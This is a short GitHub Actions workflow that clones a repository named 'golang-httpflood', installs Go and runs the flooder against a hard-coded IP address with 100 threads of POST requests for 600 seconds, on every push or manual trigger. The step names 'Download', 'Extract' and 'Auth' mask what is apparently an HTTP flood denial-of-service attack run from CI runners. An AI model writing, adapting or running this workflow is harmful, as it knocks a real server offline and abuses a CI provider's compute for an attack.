name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - name: Download
      run: git clone https://github.com/FloppaAirlines394/golang-httpflood.git
    - name: Extract
      run: sudo apt install golang
    - name: Auth
      run: go run golang-httpflood/httpflood.go http://51.15.25.108/ 100 post 600 nil
